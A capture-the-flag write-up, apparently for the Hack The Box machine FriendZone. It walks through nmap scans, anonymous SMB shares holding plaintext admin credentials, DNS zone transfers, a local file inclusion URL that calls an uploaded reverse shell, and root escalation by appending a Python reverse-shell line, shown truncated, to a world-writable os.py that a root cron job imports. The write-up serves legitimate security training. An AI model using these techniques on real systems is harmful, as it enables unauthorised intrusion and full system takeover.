Overview
This machine forces you to think about DNS servers and name lookups critically.
It starts off with the typical unsecured SMB shares where credentials are found, but then takes a twist requiring the user to enumerate subdomains and DNS records. After uncovering sub domains you are required to visit many sites over HTTP and HTTPS. Eventually finding a login page that has a local file inclusion vulnerability. This means we can upload a file to the webserver and call it through the url with a ? query and appending the statement. This calls our script and executes a bac kdoor.
A cron job running is executing an important python script every 2 minutes that reveals the OS module is being imported as apart of the script. We are able to inject code into the OS module as the permissions are not configured properly. From here we execute code for a back door.
Summary
Insecure SMB shares reveal password
Subdomain enumeration provides a new target
DNS enumeration provides a new subdomain of the subdomain.
This domain on the dash board page has an LFI vulnerability
A python script executing as root has 777 permissions and we can inject code and wait for root to execute.
Tools/Blogs used
smbclient
dig
Lessons Learned
This machine was fairly pain free. I enjoyed the python library injection.
Enumeration
[★]$ nmap 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:32 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
2920/tcp filtered roboeda
Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds
Enumeration detailed
Standard nmap scan but with the addition of -sC and -sV to use default scripts and check versions.
nmap -sC -sV 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:26 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m40s, deviation: 1h09m16s, median: 19s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-11-30T15:26:58+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-30T13:26:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.54 seconds
SMB Enumeration - Port 445 / 139
smbclient -L 10.10.10.123
Enter WORKGROUP\htb-bluedolphin's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Well I tried smbmap to quickly check the permissions but it has not been working, so I will have to dive in and check each file share individually. But before we do this I performed a little research to help automate my ongoing process and found the nmap scripting engine has an SMB enumeration nse script that can be successfully called.
nmap --script smb-enum-shares.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:44 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 70.00 seconds
We can see that the dev and general share are open for business. The development share had nothing of use, but the general share had plain text credentials.
General Share
smbclient //10.10.10.123/general
Enter WORKGROUP\htb-bluedolphin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 20:10:51 2019
.. D 0 Wed Jan 23 21:51:02 2019
creds.txt N 57 Tue Oct 9 23:52:42 2018
9221460 blocks of size 1024. 6460344 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
HTTP Enumeration - Port 80
This smells like sub domain enumeration.
Browsing to friendzoneportal.red redirects us to the /?z directory. Firing up burb suite to intercept the request just redirects us to the main page again.
Testing the HTTPS page provides us with a different landing page.
A look into the DNS logs using dig showed us a couple subdomains.
dig axfr friendzoneportal.red @10.10.10.123
; <<>> DiG 9.16.2-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Nov 30 15:42:41 UTC 2020
;; XFR size: 9 records (messages 1, bytes 309)
The above subdomains are to be added to the etc/hosts list, and mapped to the servers ip address. This allows our device to make a formal A record request to the DNS which can map it to the appropriate IP.
Logging in with those credentials we found in the smb general share we are brought to a page that simply suggests we look elsewhere.
Back to the drawing board
It was here that taking a step back was much needed. Another attempt at the sub domain enumeration turned over friendzone.red, so a dns dig provided some juicy information.
└──╼ [★]$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.16.2-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sat Dec 05 18:29:32 UTC 2020
;; XFR size: 8 records (messages 1, bytes 289)
Adding administrator1.friendzon.red to /etc/hosts provided us access to the admin login page. But only after going over https. Initially http was providing a broken page. This was a bit of a red hearing.
This successfully brought us to the admin login page, where the credentials from the insecure SMB share have provided access.
The login page redirects us to dashboard.php
This took some time to figure out but if we query the host for the suggested image parameter we get what we want. Just the like webpage suggested "please enter to show the image".
So we uploaded a shell through the smb protocol to the Development directory.
From there we called our reverse shell by appending the URL with a LDI to ../../../etc/Development. We called the shell with the previously defined syntax and received a backdoor.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
We get the flag from here, easy peasy :)
Privilege Escalation
After some initial enumeration I did not find much. Eventually I ran pspy and noticed a script being called every few minutes.
Investigating this script provided us with the following file contents.
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
It was suggested that at this point we have to spend time enumerating and researching the script. Eventually I researched the python module 'OS' and came across research regarding exploitation.
I found some information but nothing overly helpful, but I learned the os.py file has open permissions.
friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
friend@FriendZone:/opt/server_admin$
So this means we can inject code into the library and then when the script is called, it will call the library with "import os" which will call and execute our script.
Initially I tried to inject code to cat the root flag into the temp folder and had no luck. I was not familiar enough with the syntax to troubleshoot the issue in a timely manner. So I decided to move into an area I was more syntactically familiar.
I proceeded to attempt reverse shell injections and had some issues but eventually settled on the python reverse shell with IPV4 syntax. I had to actually remote the python -c and the double quotes to get this to work. You can see the screen shot below:
This was pasted at the end of the os module.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s$
コメント